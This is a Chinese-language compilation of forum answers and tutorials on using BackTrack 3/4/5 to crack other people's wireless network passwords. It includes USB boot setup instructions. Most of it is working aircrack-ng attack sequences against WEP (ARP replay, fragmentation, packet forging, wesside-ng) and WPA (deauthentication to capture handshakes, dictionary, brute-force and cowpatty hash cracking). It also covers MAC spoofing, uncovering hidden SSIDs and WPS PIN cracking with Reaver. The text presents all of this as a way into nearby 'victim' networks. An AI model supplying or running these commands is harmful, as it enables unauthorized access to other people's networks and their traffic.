BT4破解是（BT5破解）

BT4到底能不能破解wpa或者wpa2无线密码?谁能给我一个满意会回答?

BT4不可以破解WPA或WPA2加密方式的，要不出来BT5干嘛，BT4就是抓包攻击跑字典来破密码，对于WEP加密和弱密码可以，现在都是穷举BIN码破解 只要方法对， 时间到！ 再难的MM也自然会出

BT4说白也是一个电脑系统，和window一样，不过这个系统黑客们喜欢

BT4过时了 建议BT5 或装虚拟机加载破解镜像软件来穷举BIN码破解

BT4破解都需要什么?

1、电脑有无线网卡或外接无线网卡都行。BT4主要用于破解无线网络的密码(也只针对WEP加密的网络)，没有无线网卡，根本不能谈破解。

2、BT4是一个操作系统，与win7没任何关系，你把光盘插入光驱，设置系统光驱启动按照提示就可以进去了。(BT4有时候可能与显卡兼容有问题)

bt4 u盘破解

BT4 U盘安装首先说明，此方法只适用于BT4正式版，因为该版的引导方式与其他版本不同。

下面来说说具体步骤：

一、准备工作：（3个软件在本文章最后提供下载，ISO文件可自己另行下载）

1、bt4-pre-final.iso (系统镜像)

2、grub4dos （软件）

3、dos的引导文件（3个，command、io.sys、msdos.sys ）

4、HPUSBFW （惠普的格式化工具）

二、制作步骤：

1、用HPUSBFW软件,以格式化的方式将DOS引导文件写入U盘；

2、将grub4dos解压出来，把里面的 grldr ， Grub.exe ， menu.lst 这3个文件复制进U盘根目录；

3、 把 BT4.iso 里的 boot ，casper 这2个文件夹复制到U盘根目录；

4、用 boot\grub 目录下的 menu.lst 替换掉U盘根目录下的 menu.lst 这个文件;

三、测试：

1、开机，进入BIOS，设置为U盘优先启动，然后保存并重启；

2、开始时会闪过win 98 的启动界面，然后进入到DOS；

3、输入命令“grub” ，然后按回车键，进入到grub引导模式；

4、根据提示和个人需求选择自己想要的模式；

5、系统加载完毕后，使用用户名：root， 密码：toor ；进行登录；

6、进入到图形化界面的命令为 startx 。

好了，所有过程都说明白了，大家快开始自己的BT4之旅吧！

附上上面提及到的3个软件的下载链接：

grub4dos

DOS引导文件 （因为是系统文件的缘故，需要把文件夹属性中的“隐藏受保护的系统文件”前面的勾去掉，这样就能显示所有的文件了。）

HP_USB_磁盘存储器格式化工具_V2.0.6.rar

WEP破解 BT4破解教程详细解答问题

WEP破解] BT4破解教程详细解答 花钱买的，无偿给大家看，鄙视收费的人

记录付费主题, 价格:金币 3 元 1.下载光盘版BT4VM版和虚拟机，制作虚拟启动BT4。VM版的BT4可 能都集成网卡无用，但对USB网卡支持很好。

2.启动BT4，选console控制台模式，用户名root,密码toor注意不是root,再运行startx启动窗口模式。

另：BT4启动黑屏问题解决办法

输入root toor 登录系统后在输入 fixvesa 然后 startx如果不行就输入 fixvmware,然后输入startx.还是不能就输入Xorg -configure 然后startx

我的笔记本是三星R458的，启动BT4，startx时按住空格可以进入.。

在输入用户名root 和密码toor 以后输入xconf 这时会黑屏一会，然后出来提示符再输入startx 可进入

win窗口；当实在不能进入win窗口的时候你也可以直接在提示符下输入各破解命令，同时可用alt+f1 打开

一个shell，alt+f2 打开第二个shell，alt+f3 打开第三个等。关闭窗口用PRINT SCREEN 键

---------------------end---------------------

[] 可选

回显

/ 或者

() 提示

---------------------WEP---------------------

shell 1:----------------------------------------

1.ifconfig -a

wlan0 ... xx:xx:xx:xx:xx:xx

[

macchanger -m 00:11:22:33:44:55 wlan0

修改自己网卡的MAC 地址。当对方设置了MAC 地址过滤时或为了方便后面输入

]

2.ifconfig -a wlan0 up

(可能要加载网卡才支持注入?)

3.airmon-ng start wlan0 6

monitor mode enabled on mon0

(6是频道)

另一说5100要支持注入用airmon-ng start wlan0

如果这里回显(monitor mode enabled) 则下面命令所有端口号要用"wlan0"

[

aireplay-ng -9 mon0 / aireplay-ng --test mon0

Injection is working/No anwser(注入攻击成功/不成功)

(检测你的网卡是否支持注入)

]

4.airodump-ng -w pack -c 6 mon0/wlan0

(pack是随便起的获取的ivs的保存文件的名字)

另一说用airodump-ng --ivs -w pack -c 6 mon0/wlan0

shell 2:----------------------------------------

一、有客户端：

破解:abcd四种方式

a.合法客户端产生大量有效的数据，能直接获得大量cap。

收到10000以上data后，直接转shell 3,破解密码

b.合法客户端只能产生少量数据，就需要注入-3攻击加速产生大量数据。

5.aireplay-ng -3 -b 000000000000(APmac) -h 111111111111(合法客户端mac) mon0/wlan0(wlan0测试不行)

Read 11542 packets got 12587 ARP ...,send 71524 packets ... 很多类似行

c.合法客户端不在通信，注入模式不成功，

用-0 冲突模式强制断开合法客户端和ap连接，使之重新连接，

新连接所产生的握手数据让-3 获得有效的ARP从而完成ARP注入

5.aireplay-ng -3 -b 000000000000(APmac) -h 111111111111(合法客户端mac) wlan0

6.aireplay-ng -0 10 -a 000000000000(APmac) -c 111111111111(合法客户端mac) wlan0

(可能要另开窗)

d.有客户端，并且客户端能产生有效arp 数据的另类破解方式

输入modprobe –r iwl3945

(加载网卡)

输入modprobe ipwraw

输入airmon-ng start wlan0 6

现在，只要一个命令就搞定，输入:

输入wesside-ng -i wlan0 -v 01:02:03:04:05:06此格式的APmac。

key: 12:34:56:78:90

二、无客户端：

5.aireplay-ng -1 0 -a 000000000000(APmac) -h 111111111111(Mymac) mon0

(我成功了)

另一说用aireplay-ng -1 0 -e Kingnet -a (APmac) -h (Mymac) mon0/wlan0

Authentication successful

Association successful

(建立虚拟伪装连接)

如果失败可尝试降低网卡速率后再试:iwconfig mon0 rate 2M(注意大写)

破解:abcd四种方式

a.-2 crack mode ---------------

建立虚拟连接后直接用-2交互攻击模式集合了抓包，提数据和发包攻击

6.aireplay-ng -2 -p 0841 -c ffffffffffff -b (ap mac) -h (my mac) wlan0

发包成功后可得到足够的ivs，然后用aircrack-ng破解

b.-3 crack mode ---------------

6.aireplay-ng -3 -b (AP mac) -h (MY mac) mon0

7.用aircrack-ng破解自己添加的步骤?

c.-4 crack mode ---------------

-4攻击模式；制造数据包；-2交互式攻击模式

6.aireplay-ng -4 -b (APmac) -h (Mymac) mon0

?yes

Saving keystream in replay_dec-0523-075615.xor

7.packetforge-ng -0 -a (APmac) -h (Mymac) -k 255.255.255.255 –l 255.255.255.255 -y replay-xxx.xor -w myarp

(提取上面xor 文件来伪造一个arp包)

8.aireplay-ng -2 -r myarp mon0

一说用aireplay-ng -2 -r myarp -x 512 mon0

(发现了可利用的myarp的数据包，按y后，立刻注入攻击。Date疯涨)

9.用aircrack-ng破解

d.-5 crack mode ---------------

-5碎片攻击模式；制造数据包；-2交互式攻击模式

(我成功过)

6.aireplay-ng -5 -b (ap mac) -h (my mac) mon0

?yes

Saving keystream in fragment-1216-201426.xor

(利用-5 碎片攻击模式获得一个可用的包含密钥是数据文件（xor 文件）)

7.packetforge-ng -0 -a (APmac) -h (Mymac) -k 255.255.255.255 -l 255.255.255.255 -y fragment-xxx.xor -w myarp

(Myarp随便起的文件名)

Wrote packet to: myarp

8.aireplay-ng -2 -r myarp -x 256/512 mon0

?yes

(这时，前面的抓包窗口上的data 将迅速增加)

(512是攻击速度，1024是最大值)

9.采用aircrack-ng 来进行破解

shell 3:----------------------------------------

aircrack-ng *.cap

如果shell 1用了--ivs 参数，则这里用aircrack-ng *.ivs

(我成功了)

另一说用aircrack-ng -n 64 -b APmac pack-01.cap

KEY FOUND! [......] ASCII:XXXXX

附:

5100用BT4+spoonwep2破解

1.把spoonwep2放在BT4\modules\下,启动BT4

2.

ln -fs bash /bin/sh

ls -al /bin/sh

显示bash为成功,dash为失败

3.开spoonwep2，里面可以找到网卡了,选wlan0进入搜索，但这时不会搜出来什么，

关闭一下spoonwep2再重启spoonwep2，

这时网卡项里有一个mon0的，选mon0,driver选normal,mode选unknow victim,选定PO841 replay attack，点击launch后就等待密

码的出来(sata数据包到30000个左右)。

(注：论坛中的高手说spoonwep2支持5100AGN网卡注入式破解)

---------------------end---------------------

---------------------WPA---------------------

1.ifconfig -a

wlan0 ... xx:xx:xx:xx:xx:xx

2.ifconfig -a wlan0 up

3.airmon-ng start wlan0 6

monitor mode enabled on mon0

(6是频道)

4.airodump-ng -w 12345 -c 6 mon0/wlan0

(保存名为12345.cap)

(-w：写入文件，-c：截取cap的频道)

5.aireplay-ng -0 10 -a (ap mac) mon0/wlan0

或者输入：aireplay-ng -0 10 -a (ap mac) -c (合法客户端mac) mon0/wlan0(wlan0可能不对)

18:56:20 Sending 64 directed DeAuth,... 一些类似行

(-c后面为合法无线客户端的MAC地址)

(迫使AP重新与已连接的合法客户端重新握手验证)

(攻击几次后可以做破解尝试。WPA破解不用等到数据Data 达到几万，

因为它只要一个包含WPA握手验证包就可以了)

Cap数据包破解:

a.暴力破解

6.aircrack-ng -x -f 2 12345*.cap

另一说是用aircrack-ng -z -b (ap mac) 12345*.cap

b.字典破解

6.aircrack-ng -w password.txt 12345*.cap

另一说是用aircrack-ng -w password.txt -b (ap mac) 12345*.cap

(

-w：是字典破解模式

Password.txt是你事先准备好的字典。

技巧：可以在windows 下使用下载的字典工具生产字典，再在BackTrack3 下拷贝到/root 下（aircrack 默认

的工作目录在/root）。

请注意，破解WPA 密码的时间取决于密码难易程度，字典包含程度，内存及CPU 等。多则数小时。

)

c.把CAP数据包拷贝出来在WIN下用WinAircrack 破解

启动WinAircrack,General-)Encryption type-)wpa-psk,Capturefiles-)12345-01.cap

Wpa-)Dictionary file-)pswd.txt,点右下角Aircrack the key...

Key Found! [xxxxxxxx]

d.HASH破解

6.genpmk -f dictionary.txt -d D-LINK.hash -s D-LINK (注意大小写)

(Windows版本操作步骤与其Linux下版本完全一致)

(

参数解释：

-f 这里跟上采用的字典

-d 生成的Table文件名称

-s 目标AP的ESSID

)

7.cowpatty -d D-LINK.hash -r *.cap -s D-LINK

(

参数解释：

-d 导入WPA PMK Hash Table文件名称，下图中为dlink-birth.hash

-r 事先捕获的WPA握手数据包

-s 目标AP的ESSID

)

---------------------end---------------------

WPA破解，怎么知道有握手包被截获？

airodump-ng监视窗右上角有提示:

...... WPA handshake: 00:90:4c:8e:00:65

BT4抓包后，cap文件保存在哪？

输入ls可以看到啊,默认在root下。

如何获得合法端mac？

windows下可以使用OmniPeek、Wireshark、Ethereal、Aircrack-ng for Windows等工具实现对客户端MAC的拦截，Linux可用

Kismet、Aircrack-ng中的airodump-ng等来实现。需要注意的是，若目标网络采用WEP或者WPA加密的话，有时需先行破解再对数据

包解密方可看到客户端MAC。

前面第一个shell，如下若有station显示,bb:bb:bb:bb:bb:bb就是合法客户端mac

BSSID STATION ...

aa:aa:aa:aa:aa:aa bb:bb:bb:bb:bb:bb

如何查找隐藏的SSID？

1.在BT4下先打开一个shell,输入

airodump-ng 网卡端口

2.打开另一个shell,输入

aireplay-ng -0 10 -a AP'MAC -c 合法客户端'MAC 网卡端口

可能这个命令由于频道不对会出错,这时就要多重输几次(如果不行,就是不是合法客户端,要再试其它的客户端),直到提示成功为止

3.然后就可以在上个shell,看到显示出来的SSID。

WIFI，BT4破解

无线破解分很多，其中有2中，一种是没设置密码的，一种是设置密码的，设置密码的又分很多种：“WEP/WAP/WAP2等， 设置密码目前可以支持破解的是WEP的方式， 到网上下载个BT5、BT4、BT3，等随便什么，自动就可以破解，其他的可以破解，但是费事费力费空间，一台笔记本的硬盘空间相对来说就芝麻点大。 你网上搜索下就OK了，很多教程！

有一个wifi万能钥匙，通过从云端获取网友分享已知的Wi-Fi热点信息来联网的工具，个别地方还是能用的。

还有一个畅无线，说是能破解CMCC和CMCC-edu的密码，你可以试试。

BT3破解WEP没的说，，，如果是WPA,WPA2，最好是有人在上网，截获握手包后，选择字典破解就可以，还有就是字典一定大，光数字组合，八位数的就1G左右呢，，，带英文字母就要更大了，，，EMSA是用于XP下破解握手包的，，，抓握手包的话，可以用BEINI,这个就是奶瓶了，，还有一款CDLINUX，，也是的，还有一个是XIAOPANOS的，可以利用WPS破解，大部分路由器会被外带天线的卡王PIN死，，，破解WPS PIN8位数字后，可以安装QSS,WPS连接路由器就可以了，输入密码，路由器会自动适配，你就不用管了，直到能上网就可以了。。。记住破解PIN的是REAVER,,,INFLATOR是REAVER的图形程序，，，内置天线的网卡的就不要破了，信号不好，掉线太厉害，而且信号一定要好，否则可就痛苦了，，，目前还没有一款密码不能破解的，如果条件允许，破解密码其实就是小菜，，如果是弱口令，我用安卓手机也可以破解，，如果你想学，可以加入我的团队，IT狂人，，已经破解过三个WPA2了，不支持WEP,,,,

如何利用BT4破解无线网络密码？

无线网络WEP破解索引

1.先确认你的网卡是否支持BT3,BT4,如果不支持就换个卡,推荐USB的,最好可以换天线,这样信号不好的时候可以增加天线获取好的信号.

BT3网卡支持列表看这里

2.下载BT3系统.

BT3全称Back Track 3，这是一个linux环境的便携系统，可以放到U盘或者光盘中启动，对本身硬盘没有影响，无需在本地安装，现在已经有BT4的BETA版了，喜欢尝鲜的朋友可以试一下

是圈内非常著名的黑客攻击平台，说白了就是一个封装好的Linux操作系统，内置大量的网络安全检测工具以及黑客破解软件等。BT3因可以方便的破解无线网络而出名，其中内置的spoonwep是一个非常强悍的图形化破解WEP无线网络密码的工具。

官方网站

bt3 beta版和BT3 final版 下载地址

BT4 beta版下载地址

其中有ISO格式，U盘格式，还有虚拟机Vmware格式的，大家各取所需，这里我用的是U盘版.

3、下载Spoonwep2

Spoonwep2这个软件。非常方便，能够先扫描，再选择，不用再输入MAC，破解IV也是自动的，无须在命令行下输入烦琐的命令。

spoonwep2是在原来的版本基础之上的更新之作，让使用者可以更加方便的进行对无线网络的扫描、抓包或者注入抓包，破解密码。

互联网上有很多基于BT3进行WEP密码破解的教程，都是用的spoonwep2做的范例。而BT3中默认装的是spoonwep，所以赶快升级吧，免得到时候版本不对搞的自己莫名其妙。

spoonwep2下载地址：

4、安装

参考最简单的硬盘启动BT3方法,不要安装GRUB.

首先我们先找到c盘根目录下的boot.ini文件，先去掉它的只读属性.

然后添加如下信息：c:\grldr="BackTrack 3" 引号中的文字大家可以自定义.

把grldr文件拷到c盘根目录。

把BT镜像文件里面的文件解压缩出来，有两个文件夹 boot和BT3，如果是bt3请改为大写，要不然是启动不了的，当然用BT3的USB版解压以后也是一样的用法。5.把这两个文件夹拷贝到d盘根目录（c,d,e,f盘都可以）但是需要改动grldr的里面的启动路径信息。启动的时候可以编辑,默认boot和BT3文件夹在d盘根目录。

解压spoonwep2.lzm，放到d:/BT3/modules/下面.

硬盘启动文件下载

5、启动

重新启动电脑,启动菜单选择BackTrack 3会出来首页面,有很多选项，选择第一个"BT3 GRAPHICS MODE KDE" 就可以了.如果无法进入,或者是黑屏选择第3个进去后，可以看到漂亮的黑色BACK TRACK的Linux系统桌面,开个终端窗口里输入“spoonwep”，启动。

选择无线网卡，选择无线网卡，根据自己的选吧（实在不会都都试一下，看哪个能搜到信号就用哪个）驱动选normal，因为作为攻击端，我们并不清楚对方WEP的密码是多少，所以选unknown victim。选好后点下面的next。

进入“Victims Discovery”。点右边LAUNCH，系统开始扫描周边的无线网络。

搜索信号完成后，会看到很多无线网络（如果你没搜到，不是网卡选择错误就是附近没人用无线网络）选择其中一个，在软件下方会看到此AP的客户端，选择其中PACKET比较多的一台（因为我们是根据分析数据包来破解密码的，所以数据包越多破解的速度越快）

选择后，如图所示我们有4种攻击方式，2种分析数据模式（64位或者128位），都选择好，点击LAUNCH，等就可以了

大概抓包到3万左右，在SpoonWep2窗口中会出现密码.

详细的SPOONWEP破解教程下载:

BT3下SPOONWEP视频教程下载:

当然自动破解有很多不可知因数,要想进一步了解看命令教程.详细的命令教程下载:

因为命令输入比较繁琐,输错1个字符就会出错,可以下载命令生成器,下载地址: